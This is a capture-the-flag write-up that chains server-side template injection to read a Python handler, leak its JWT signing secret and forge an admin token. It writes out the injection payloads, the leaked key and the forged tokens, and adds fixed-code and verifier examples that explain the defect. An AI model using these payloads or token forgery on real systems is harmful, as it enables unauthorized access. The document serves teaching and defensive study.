WX01 - 1000pts

Briefing

Access the url at: https://cfta-wx01.allyourbases.co and find a way to login to the admin portal to get the flag. Note: You have been provided with the following credentials to help you: username: tim password: berners-lee

Solution

  1. There is a login form and a form to enter an email address to get help logging in. Attempting to log in with the provided credentials, tim:berners-lee, and monitoring requests using Burp Suite shows a POST request with the JSON action key set to verify and a token key that carries a JSON Web Token.
  2. I attempted to brute-force decrypt this JWT, but it did not succeed.
  3. I moved on to the help form. It has to serve a purpose and thus must be vulnerable to some form of input. I tried an SSTI (Server Side Template Injection) similar to the Italian dish suggestion site from WM04. Crashing the help form using the SSTI string {{foo()}} prints this as part of a stack trace:

         File "/var/task/lambda_function.py", line 18, in getHelp
           msg = Template(template).render(dir=dir, help=help, locals=locals, globals=globals, open=open)

     We have access to locals() and globals(). Also, open() lets us read an arbitrary file.
  4. Use {{open('lambda_function.py').read()}} to dump the contents of lambda_function.py (the handler cuts its response to 700 characters, so the dump below is what fits in that window; the import that provides Template is not visible in it):

         import json
         import urllib
         import jwt
         import os

         # JWT Key
         key = "aversion-chute-freeway-corporal"
         algo = "HS256"

         def getHelp(event):
             email = ''.join(event['email'])
             # User input is spliced into the template source itself; only < and > are escaped
             template = """
         <p>Your request has been submitted.</p>
         <p>You will receive an email at: %s</p>
         <p>This might take a reaaaaaaally long time though (forever).</p>
         """ % (urllib.parse.unquote(email).replace("<", "&lt;").replace(">", "&gt;"))
             # Builtins handed to the template context are reachable from any injected expression
             msg = Template(template).render(dir=dir, help=help, locals=locals, globals=globals, open=open)
             # Truncates the response to its first 700 characters
             msg = msg[:-len(msg)+700]
             return msg

     The JWT key is aversion-chute-freeway-corporal.
  5. Log in with credentials tim:berners-lee to get a JWT: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJ1c2VyIn0.j8wX114OSLEo2I4S6GQ4wQ4ZszXtyp0wFc0lpwc1yRQ
  6. Use jsonwebtoken.io to change the role value from user to admin, signing with the leaked secret key, to get a new JWT: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJhZG1pbiIsImp0aSI6IjUxZjE3OTJiLWMwYjItNGQ3NS04YjY5LTE0ZDM5ZjJkMGM2NiIsImlhdCI6MTYxNzcyNDk1MiwiZXhwIjoxNjE3NzI4NTUyfQ.QoopGSdFjhSe0gxHwEng-n6e9Z5FTP3_-iemndGcJVU
  7. Send a request with this JSON {"action":"verify","token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJhZG1pbiIsImp0aSI6IjUxZjE3OTJiLWMwYjItNGQ3NS04YjY5LTE0ZDM5ZjJkMGM2NiIsImlhdCI6MTYxNzcyNDk1MiwiZXhwIjoxNjE3NzI4NTUyfQ.QoopGSdFjhSe0gxHwEng-n6e9Z5FTP3_-iemndGcJVU"} to get the flag.
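The root cause in the dumped handler is that the email value is spliced into the template source with %s before Template(...).render() runs, so escaping < and > does nothing against {{ }}: the input becomes part of the template program, and every builtin passed to render() is reachable from it. The following is an added example, not the challenge's code: a constructed handler with the same defect beside a fixed version that keeps the template source constant, passes the address only as a render variable, enables autoescape, and exposes no builtins. It assumes the engine is Jinja2 (the {{ }} syntax and the Template/render API match it), which the page does not state outright.

```python
from jinja2 import Environment

# Constructed example, not the challenge's lambda_function.py. Same defect as the dump:
# user input is interpolated into the template *source* before rendering.
def render_help_vulnerable(email: str) -> str:
    template = """
<p>Your request has been submitted.</p>
<p>You will receive an email at: %s</p>
""" % email.replace("<", "&lt;").replace(">", "&gt;")
    # HTML escaping does not touch '{{', so any template expression in email is evaluated.
    # (No builtins are passed here; the real handler also exposed open/globals/locals.)
    return Environment().from_string(template).render()


def render_help_fixed(email: str) -> str:
    # The template source is a constant; user data only ever arrives as a context
    # variable, which autoescape HTML-escapes. Nothing beyond that variable is exposed.
    env = Environment(autoescape=True)
    template = env.from_string("""
<p>Your request has been submitted.</p>
<p>You will receive an email at: {{ email }}</p>
""")
    return template.render(email=email)


def probe_evaluates(render, probe: str = "{{ 7 * 7 }}") -> bool:
    """True if the renderer computes the probe (i.e. user input reached the template source)."""
    return "49" in render(probe)


if __name__ == "__main__":
    print("vulnerable evaluates input:", probe_evaluates(render_help_vulnerable))
    print("fixed evaluates input:     ", probe_evaluates(render_help_fixed))
    print(render_help_fixed("<b>tim@example.invalid</b>"))
```

The fixed version is also what the stack trace on this page tells you to look for when reviewing such handlers: a render() call that receives open, globals or locals is a finding on its own, even before the input path is traced.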
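Step 6 works because HS256 is a shared-secret MAC: whoever holds the key can mint a token with any claims, and the server has no way to distinguish a token it issued from one signed by someone who read the key out of lambda_function.py. The added example below (standard library only, not the challenge's code; the key is a constructed placeholder, not the leaked one) shows what the verify action should be doing before it trusts the role claim: pin the algorithm, recompute the HMAC over header.payload, compare in constant time, and only then decode the claims. A token whose role is edited without re-signing is rejected, as is an alg=none header; a token signed with the real key is accepted whatever it says, which is why key exposure is the whole break.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed secret for this example only; the challenge's leaked key is deliberately not reused.
SECRET = b"example-secret-for-demo-only"


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    # JWT base64url omits padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Mint a compact HS256 JWT (what the login endpoint does server-side)."""
    header = _b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode("ascii")
    sig = hmac.new(key, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Return the claims only if the header pins HS256 and the MAC matches; otherwise None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        provided_sig = _b64url_decode(sig_b64)
    except ValueError:  # wrong segment count, bad base64 (binascii.Error) or bad JSON
        return None
    # Pin the algorithm: never let the token choose it (rejects "none" and key-confusion attempts).
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    # Constant-time comparison so signature checking does not leak via timing.
    if not hmac.compare_digest(expected, provided_sig):
        return None
    return json.loads(_b64url_decode(payload_b64))


def swap_role_unsigned(token: str, role: str) -> str:
    """Edit the role claim but keep the original signature: a correct verifier must reject this."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    claims = json.loads(_b64url_decode(payload_b64))
    claims["role"] = role
    return f"{header_b64}.{_b64url_encode(json.dumps(claims, separators=(',', ':')).encode())}.{sig_b64}"


if __name__ == "__main__":
    user_token = sign_hs256({"username": "tim", "role": "user"}, SECRET)
    print("issued token verifies as:", verify_hs256(user_token, SECRET))
    print("edited payload, old MAC:  ", verify_hs256(swap_role_unsigned(user_token, "admin"), SECRET))
    print("wrong key:                ", verify_hs256(user_token, b"not-the-key"))
```

The check that matters is the last line of verify_hs256 being reached only after the MAC comparison; code that decodes the payload first and "validates later" is how role claims get trusted unsigned. Note what the verifier cannot do: once the secret is in an attacker's hands, every token it signs is indistinguishable from a legitimate one, so the mitigation is keeping the key out of the handler's readable files, not a smarter verifier.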

Flag

muLtiStagingIT710-12